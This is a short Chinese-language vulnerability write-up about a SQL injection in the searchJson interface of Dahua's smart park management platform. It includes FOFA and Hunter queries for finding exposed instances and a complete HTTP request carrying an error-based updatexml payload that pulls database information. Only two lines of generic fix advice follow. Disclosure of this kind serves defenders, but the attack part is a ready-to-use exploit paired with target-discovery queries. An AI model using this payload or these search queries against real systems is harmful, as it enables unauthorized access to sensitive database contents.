免责声明
文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台searchJson
接口存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,获取系统数据库敏感信息。
影响范围
大华智慧园区综合管理平台
资产测绘
FOFA:
app=“dahua-智慧园区综合管理平台”
body: “/WPMS/asset”;
Hunter:
app.name=“Dahua 大华 智慧园区管理平台”
漏洞复现
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
修复建议
1.限制访问来源地址,如非必要,不要将系统开放在互联网上。
2.关注官方升级最新版本。